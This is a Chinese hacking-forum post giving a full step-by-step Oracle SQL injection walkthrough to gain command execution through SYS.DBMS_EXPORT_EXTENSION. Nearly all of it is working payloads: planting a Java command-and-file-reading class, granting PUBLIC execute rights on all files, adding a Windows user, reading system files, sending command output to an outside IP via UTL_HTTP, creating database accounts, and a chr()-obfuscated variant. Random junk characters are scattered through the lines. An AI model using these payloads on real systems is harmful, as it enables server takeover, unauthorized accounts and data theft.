找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2307|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成   G- `& c$ A- \
' ^1 [* R9 C1 ]  S# K& U
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
/ ~4 }1 w8 [/ @* a6 f% S的形式即可。(用" 'a'|| "是为了让语句返回true值)
  k9 f" e# l4 d1 f# O; Z$ @语句有点长,可能要用post提交。
/ F/ o9 H0 R' x! q1 z$ u9 o以下是各个步骤:
7 A  z& g. j- b1.创建包
3 x" i* m8 Y) h" m) m8 H; ~( B通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:6 f3 o) T' T' d# d9 J
/xxx.jsp?id=1 and '1'<>'a'||( # c- S/ t3 t- s4 V  P! X" m4 C
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 l# e0 z4 O, ]( V0 i7 E
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(0 T5 D9 ]/ |: g) a6 N0 K
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
/ k$ I. d$ p" |: i5 L8 u}'''';END;'';END;--','SYS',0,'1',0) from dual
  z5 y; X9 a, @3 @) , D+ I3 ]) k* m6 T  @4 q
------------------------
# E( y/ T! ^% \, E/ C6 j如果url有长度限制,可以把readFile()函数块去掉,即: 6 H. u! t: y& F6 F3 d
/xxx.jsp?id=1 and '1'<>'a'||(
* |; L3 R. o5 `/ w3 M) Sselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" h7 ?, ]+ y3 Q( Y* A/ a* [8 ucreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(: L  A. c0 ]5 ^0 q4 G7 {2 C$ C& D
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}4 t( t! W0 N, n: B
}'''';END;'';END;--','SYS',0,'1',0) from dual
% w  L1 u$ k' ^! X- v0 ]7 E+ W/ A) 6 Y# f, T6 _2 a5 Y' A) Y& Y
同时把后面步骤 提到的 对readFile()的处理语句去掉。 : J  n7 [- c1 i7 Z5 l
------------------------------
4 k$ O; W9 _) r2.赋Java权限 1 `( h. z3 t; r, q2 U8 V
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual; e7 J+ A+ F' s* n& _6 h
3.创建函数
/ ]2 Z$ D. i! r) X$ l7 r7 x1 @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
8 a6 o/ n$ g" u- X  r* s2 ?0 j, u. ?create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
# J: `5 t. ], t$ h  Fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! a5 J, P. T8 r& e" ^
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
' h4 Q6 }6 w1 E5 |0 `6 i5 Q4.赋public执行函数的权限 ) G! u$ s+ v: x7 s* d0 {; D) L
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
2 |* @9 Z0 y$ W$ W% I9 J3 m2 yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
) P4 y0 f2 {3 Q3 t7 X0 u8 B5.测试上面的几步是否成功 " h& b* R8 {* N: k
and '1'<>'11'||(
5 u! l# q7 {9 P( L5 [- Kselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
+ i5 t; R2 u& T7 M8 n)
, p4 |$ T' T5 ]/ j  {- [* aand '1'<>(
; C/ I' T" P5 n  m7 @! V; \3 W( J2 [) k! zselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' 9 ]1 t8 r. C9 G5 d% n' ~3 U3 h# Z
)
0 I% D+ n% e; \# n& c' `2 e6.执行命令:
5 W( S5 n4 F% d$ w- A+ R/xxx.jsp?id=1 and '1'<>(
+ D" Q  h# {9 Jselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual
% ]9 m& Q' k1 u" R" X! q+ l5 m: \( r( |' r& j
) ; b8 d+ w) f2 E* k
/xxx.jsp?id=1 and '1'<>( / |- f. S& }9 c" [1 N; D
select  sys.LinxReadFile('c:/boot.ini') from dual
, d8 Y) k4 J. I. {' X+ H3 a# Z* S
1 q# s5 |: C3 Q' R+ F)
2 J7 k; \' r8 G5 {7 Q  
, ?& H! [+ L- p9 o/ n+ e( L注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 ; `6 g: K# l4 M% ]( j* Z
如果要查看运行结果可以用 union : 3 _& V6 u" k# Y) e2 y4 |
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
/ r) u& A2 {: U. k: w: z6 l! E或者UTL_HTTP.request(:
/ I# K4 h- n1 U' j/ H/xxx.jsp?id=1 and '1'<>(
/ _, U; g' k0 J8 {SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
6 M% ~( `5 b6 E; C# J0 Q)
5 l# y2 N; n4 N) k1 W4 r6 j/xxx.jsp?id=1 and '1'<>(
/ w, l* [2 @' I4 ~4 a5 ESELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
' V* {' [7 ~+ t5 a5 Z7 d/ H. m6 ^) W)
* e: {5 e  p' d- u9 y3 x6 y" V6 g注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。8 M! P( O+ ?9 [% e' p
--------------------
4 _' I, |5 c8 r7 R/ c6.内部变化
, Q0 X# f) I3 ~4 u% n3 T通过以下命令可以查看all_objects表达改变:
% f2 A5 J% u% p" z7 _& K+ k* J) g0 `select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
6 E* u: F" _. B' q1 g' @7.删除我们创建的函数
. K( ^% |( D! n) r7 ^$ Hselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') x6 A9 ~. C. }* ^. F7 W3 b
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual ) `; h; ^8 a1 c& {. V! {" D
====================================================
3 D+ X1 E5 ^6 A全文结束。谨以此文赠与我的朋友。
4 G/ Y  J+ Q' Y/ a+ X1 mlinx . ^: }% C$ u4 v* ~# J5 U6 b
124829445   E+ W* e# e* h" C5 d8 k& p
2008.1.12
7 _4 ?9 @7 d3 q& e+ @linyujian@bjfu.edu.cn , r3 t8 f+ w, G, ~. t0 w' V5 p! g2 L
======================================================================
# `% i% B- q" _: [测试漏洞的另一方法:
9 ?2 I0 c' Q) o$ T创建oracle帐号:
+ g$ Q# s3 @7 [8 _& U6 `0 \select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ T' e  b/ x- `, N$ D+ C* w
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual* E2 P; a( D% O0 [; m' V( U5 J/ `
即: 9 f0 Z7 R  U7 ]" r1 P7 N1 B
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
) q5 G6 Z; L8 Uchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
9 I) P9 G5 M4 k$ x" J确定漏洞存在: : ~) D' O: _/ y5 m  Y
1<>( 8 S0 Z2 n# N3 e9 J' ^
select user_id from all_users where username='LINXSQL'
; ]. ]2 V3 n' p: g( b. Q)
1 Q% a" y7 U2 C给linxsql连接权限: ' b2 H9 i) o# ?- V4 E
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
7 w8 ^4 h0 T, W# XGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
5 s' k8 M0 K" r- v- R# d; @' ^删除帐号: 9 d" Y2 E' i+ X( G7 i* p
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" S2 z* F5 I. |. F; m, G
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
2 T' y) r, m$ S  A====================== ) y# B* V3 f9 l2 S5 q1 n2 ]. g
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:. U- ~! |& U2 Q+ m( U8 A% d
1.jsp?id=1 and '1'<>( $ n8 \$ ?) e0 X/ S2 W
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! a5 b4 ~2 O, `" b1 C- y3 J
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
) g- w. U# \& H# g$ C7 [) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE8 \, f+ m2 c: G+ o* M0 W
 )9 p' W9 D* Q( q. f
4 @" {' c; j# e8 Z
1 o$ v; b' ?& T( Q' P  q
" ?, M8 q9 x: Q2 e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表